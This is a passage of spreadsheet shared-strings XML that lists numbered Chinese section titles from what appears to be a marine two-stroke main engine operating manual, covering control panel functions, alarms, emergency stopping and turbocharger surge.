      <t xml:space="preserve">6645-0140 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>运行</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0150 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>到港前准备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0155 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机无负荷和停车</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0160 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停止</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0170 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>抵港后布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0175 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停机后再操作</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0180 ME/ME-C </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>6645-0181 ME-B</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0182 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>故障排除</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0185 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助设备的使用推荐</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0190 MOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0195 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0196 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油水混合操作</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距桨</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>MC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0210 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调距桨</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>MC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0220 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调距桨</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>MC/MC-C</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0230 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应急停车</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>6645-0240 MOP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警处理</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0242 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警参考清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0250 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机运行</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0260 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0270 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维护</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0280 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管理</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0290 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱着火</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0300 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄箱着火</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0310 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器喘振</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0320 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带增压器或气缸运转</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0321 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸注油反馈信号</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0330 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带断裂螺栓运行</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>6645-0340 LOP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机人工控制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>来自</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ESC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的操纵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全系统起动，停车</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0105 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>正常操纵转换</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0106 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动程序原理</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0110 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵机构</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0111 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加载程序原理</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0115 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距浆程序</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0120 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可控浆程序</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0125 MOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>综述</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0130 MOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0133 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主操纵面板注意清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0135 MOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>记录</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0135 MOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>日志</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0140 MOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>切断手册</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0145 MOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>频道单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0150 MOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>运行</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0155 MOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>状态</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0160 MOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>程序信息</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0162 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主操纵面板程序调试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0163 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主操纵面板主要限制器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0165 MOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸负荷</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0166 MOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>最大压力补偿</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0170 MOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸压力</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0171 MOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平均压力</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0175 MOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0180 MOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气空气</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0185 MOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸润滑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>6655-0190 MOP I/O</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试系统检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0195 MOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无效输入</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0200 MOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>网络状况</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0201 MOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>速度传感电缆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0202 MOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0204 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主操纵面板功能测试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0205 MOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>时间设置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0205 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主操纵面板故障排除</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0210 MOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>版本</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0215 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停缸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0220 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停增压器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6655-0225 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器喘振</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6665-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊运行</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6665-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊运行</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6670-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6670-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊运行用工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7040-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制单元</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7045-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动化仪表值</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7045-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7045-0300 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调动系统</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7055-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可控浆安全系统，机控室停车</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7055-0105 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可控浆机控室正倒车起动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>7055-0110 ESC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可控浆停车起动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7055-0115 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集控室安全系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7055-0120 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重启主机船桥控制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7055-0125 RC </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停车</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>7055-0130 ESC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制，停车，起动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>7055-0135 ECR.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停止</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
